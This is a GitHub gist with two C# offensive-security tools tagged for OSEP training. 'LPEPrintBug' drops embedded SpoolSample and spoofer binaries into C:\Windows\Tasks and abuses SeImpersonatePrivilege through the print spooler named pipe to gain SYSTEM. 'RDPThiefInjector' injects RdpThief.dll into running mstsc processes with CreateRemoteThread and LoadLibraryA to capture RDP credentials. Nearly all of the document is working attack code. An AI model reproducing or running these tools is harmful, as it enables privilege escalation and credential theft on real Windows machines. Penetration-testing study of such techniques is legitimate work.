Last active
December 1, 2021 06:09
-
-
Save tahadraidia/74540f5749d83b2fcbb317187cd18205 to your computer and use it in GitHub Desktop.
Taking advantage of Assembly.GetManifestResourceStream for quick dirt hacks, for more details please read: https://tahadraidia.com/posts/taking-advantage-of-assembly.getmanifestresourcestream-for-quick-dirt-hacks/ #OSEP #CSHARP #DOTNET
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
using System; | |
using System.Diagnostics; | |
using System.IO; | |
using System.Net; | |
using System.Runtime.InteropServices; | |
using System.Security.Principal; | |
using System.Threading; | |
using System.Collections.Generic; | |
using System.Text.RegularExpressions; | |
namespace LPEPrintBug | |
{ | |
public static class Program | |
{ | |
public static uint TOKEN_QUERY = 0x00000008; | |
[StructLayout(LayoutKind.Sequential)] | |
public struct LUID_AND_ATTRIBUTES | |
{ | |
public LUID Luid; | |
public UInt32 Attributes; | |
public const UInt32 SE_PRIVILEGE_ENABLED_BY_DEFAULT = 0x00000001; | |
public const UInt32 SE_PRIVILEGE_ENABLED = 0x00000002; | |
public const UInt32 SE_PRIVILEGE_REMOVED = 0x00000004; | |
public const UInt32 SE_PRIVILEGE_USED_FOR_ACCESS = 0x80000000; | |
} | |
[StructLayout(LayoutKind.Sequential)] | |
public struct LUID | |
{ | |
public UInt32 LowPart; | |
public Int32 HighPart; | |
} | |
[StructLayout(LayoutKind.Sequential)] | |
public struct PRIVILEGE_SET | |
{ | |
public uint PrivilegeCount; | |
public uint Control; // use PRIVILEGE_SET_ALL_NECESSARY | |
public static uint PRIVILEGE_SET_ALL_NECESSARY = 1; | |
[MarshalAs(UnmanagedType.ByValArray, SizeConst = 1)] | |
public LUID_AND_ATTRIBUTES[] Privilege; | |
} | |
[DllImport("advapi32.dll")] | |
static extern bool LookupPrivilegeValue(string lpSystemName, string lpName, out LUID lpLuid); | |
[DllImport("advapi32.dll", SetLastError = true)] | |
[return: MarshalAs(UnmanagedType.Bool)] | |
static extern bool OpenProcessToken(IntPtr ProcessHandle, UInt32 DesiredAccess, out IntPtr TokenHandle); | |
[DllImport("kernel32.dll", SetLastError = true)] | |
static extern IntPtr GetCurrentProcess(); | |
[DllImport("advapi32.dll", SetLastError = true)] | |
public static extern bool PrivilegeCheck( | |
IntPtr ClientToken, | |
ref PRIVILEGE_SET RequiredPrivileges, | |
out bool pfResult | |
); | |
public static bool IsPrivilegeEnabled(string Privilege) | |
{ | |
bool ret; | |
LUID luid = new LUID(); | |
IntPtr hProcess = GetCurrentProcess(); | |
IntPtr hToken; | |
if (hProcess == IntPtr.Zero) return false; | |
if (!OpenProcessToken(hProcess, TOKEN_QUERY, out hToken)) return false; | |
if (!LookupPrivilegeValue(null, Privilege, out luid)) return false; | |
PRIVILEGE_SET privs = new PRIVILEGE_SET { Privilege = new LUID_AND_ATTRIBUTES[1], Control = PRIVILEGE_SET.PRIVILEGE_SET_ALL_NECESSARY, PrivilegeCount = 1 }; | |
privs.Privilege[0].Luid = luid; | |
privs.Privilege[0].Attributes = LUID_AND_ATTRIBUTES.SE_PRIVILEGE_ENABLED; | |
if (!PrivilegeCheck(hToken, ref privs, out ret)) return false; | |
return ret; | |
} | |
// Source: https://stackoverflow.com/questions/2989400/store-files-in-c-sharp-exe-file/2989496 | |
public static void WriteResourceToFile(string resourceName, string fileName) | |
{ | |
try | |
{ | |
int bufferSize = 4096; // set 4KB buffer | |
byte[] buffer = new byte[bufferSize]; | |
using (Stream input = System.Reflection.Assembly.GetExecutingAssembly().GetManifestResourceStream(resourceName)) | |
using (Stream output = new FileStream(fileName, FileMode.Create)) | |
{ | |
int byteCount = input.Read(buffer, 0, bufferSize); | |
while (byteCount > 0) | |
{ | |
output.Write(buffer, 0, byteCount); | |
byteCount = input.Read(buffer, 0, bufferSize); | |
} | |
} | |
}catch(Exception e) { Console.WriteLine(e.Message); } | |
} | |
public static void Main() | |
{ | |
bool isElevated; | |
WindowsIdentity identity = WindowsIdentity.GetCurrent(); | |
WindowsPrincipal principal = new WindowsPrincipal(identity); | |
isElevated = principal.IsInRole(WindowsBuiltInRole.Administrator); | |
// Already admin bail. | |
if (isElevated) | |
{ | |
Console.WriteLine("Already Administrator!"); | |
System.Environment.Exit(0); | |
} | |
// SeImpersonatePrivilege not available. | |
if (!IsPrivilegeEnabled("SeImpersonatePrivilege")) | |
{ | |
Console.WriteLine("SeImpersonatePrivilege privilege is required."); | |
System.Environment.Exit(0); | |
} | |
const string spoolsample = @"C:\Windows\Tasks\SpoolSample.exe"; | |
const string spoof = @"C:\Windows\Tasks\spoof.exe"; | |
const string local = @"C:\Windows\Tasks\local.exe"; | |
string hostname = Dns.GetHostName(); | |
// Check for file on Disk | |
var files = new List<String>(); | |
files.Add(spoolsample); | |
files.Add(spoof); | |
files.Add(local); | |
Regex regx = new Regex("[a-zA-Z0-9]+.exe"); | |
foreach (string file in files) | |
{ | |
if(!File.Exists(file)) | |
{ | |
MatchCollection matched= regx.Matches(file); | |
if(matched.Count == 1) | |
{ | |
WriteResourceToFile(matched[0].Value, file); | |
} | |
} | |
} | |
// Give it time. | |
Thread.Sleep(3000); | |
// Bail if files does not exists on disk. | |
if (!File.Exists(spoof) || !File.Exists(spoolsample)) | |
System.Environment.Exit(0); | |
string spoolsampleparam = String.Format("{0} {0}/pipe/test", hostname); | |
Runner runner1 = new Runner(spoof, @"\\.\pipe\test\pipe\spoolss"); | |
Runner runner2 = new Runner(spoolsample, spoolsampleparam); | |
Thread th1 = new Thread(new ThreadStart(runner1.Execute)); | |
th1.Start(); | |
if (th1.ThreadState == System.Threading.ThreadState.Running) | |
new Thread(new ThreadStart(runner2.Execute)).Start(); | |
} | |
} | |
public class Runner | |
{ | |
private string filename = null; | |
private string param = null; | |
public Runner(string filename, string param) | |
{ | |
this.filename = filename; | |
this.param = param; | |
} | |
public void Execute() | |
{ | |
Process pr = new Process(); | |
ProcessStartInfo prs = new ProcessStartInfo(); | |
prs.FileName = filename; | |
prs.Arguments = param; | |
pr.StartInfo = prs; | |
bool ret = pr.Start(); | |
if(!ret) | |
{ | |
Console.WriteLine("Something went wrong, bail!"); | |
System.Environment.Exit(0); | |
} | |
} | |
} | |
} |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
using System; | |
using System.IO; | |
using System.Diagnostics; | |
using System.Net; | |
using System.Runtime.InteropServices; | |
using System.Text; | |
using System.Threading; | |
namespace RDPThiefInjector | |
{ | |
public class Program | |
{ | |
[DllImport("kernel32.dll", SetLastError = true, ExactSpelling = true)] | |
static extern IntPtr OpenProcess(uint processAccess, bool bInheritHandle, int processId); | |
[DllImport("kernel32.dll", SetLastError = true, ExactSpelling = true)] | |
static extern IntPtr VirtualAllocEx(IntPtr hProcess, IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect); | |
[DllImport("kernel32.dll")] | |
static extern bool WriteProcessMemory(IntPtr hProcess, IntPtr lpBaseAddress, | |
byte[] lpBuffer, Int32 nSize, out IntPtr lpNumberOfBytesWritten); | |
[DllImport("kernel32.dll")] | |
static extern IntPtr CreateRemoteThread(IntPtr hProcess, IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId); | |
[DllImport("kernel32", CharSet = CharSet.Ansi, ExactSpelling = true, SetLastError = true)] | |
static extern IntPtr GetProcAddress(IntPtr hModule, string procName); | |
[DllImport("kernel32.dll", CharSet = CharSet.Auto)] | |
public static extern IntPtr GetModuleHandle(string lpModuleName); | |
// Source: https://stackoverflow.com/questions/2989400/store-files-in-c-sharp-exe-file/2989496 | |
public static void WriteResourceToFile(string resourceName, string fileName) | |
{ | |
try | |
{ | |
int bufferSize = 4096; // set 4KB buffer | |
byte[] buffer = new byte[bufferSize]; | |
using (Stream input = System.Reflection.Assembly.GetExecutingAssembly().GetManifestResourceStream(resourceName)) | |
using (Stream output = new FileStream(fileName, FileMode.Create)) | |
{ | |
int byteCount = input.Read(buffer, 0, bufferSize); | |
while (byteCount > 0) | |
{ | |
output.Write(buffer, 0, byteCount); | |
byteCount = input.Read(buffer, 0, bufferSize); | |
} | |
} | |
} | |
catch (Exception e) { Console.WriteLine(e.Message); } | |
} | |
public static void Main() | |
{ | |
const String dllName = @"C:\Windows\Tasks\rdp.dll"; | |
String creds = String.Format("{0}/data.bin",Environment.GetEnvironmentVariable("TMP")); | |
WriteResourceToFile("RdpThief.dll", dllName); | |
if (!File.Exists(dllName)) | |
System.Environment.Exit(0); | |
Console.WriteLine("Program Strated ..."); | |
while (true) | |
{ | |
Process[] mstscProc = Process.GetProcessesByName("mstsc"); | |
if (mstscProc.Length > 0) | |
{ | |
if (!File.Exists(dllName)) | |
System.Environment.Exit(0); | |
for (int i = 0; i < mstscProc.Length; i++) | |
{ | |
int pid = mstscProc[i].Id; | |
IntPtr hProcess = OpenProcess(0x001F0FFF, false, pid); | |
IntPtr addr = VirtualAllocEx(hProcess, IntPtr.Zero, 0x1000, 0x3000, 0x40); | |
IntPtr outSize; | |
WriteProcessMemory(hProcess, addr, | |
Encoding.Default.GetBytes(dllName), dllName.Length, out outSize); | |
IntPtr loadLib = GetProcAddress(GetModuleHandle("kernel32.dll"),"LoadLibraryA"); | |
CreateRemoteThread(hProcess, IntPtr.Zero, 0, loadLib, addr, | |
0, IntPtr.Zero); | |
} | |
} | |
if (File.Exists(creds)) | |
Console.WriteLine("Found: " + creds);System.Environment.Exit(0); | |
Thread.Sleep(1000); | |
} | |
} | |
} | |
} |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment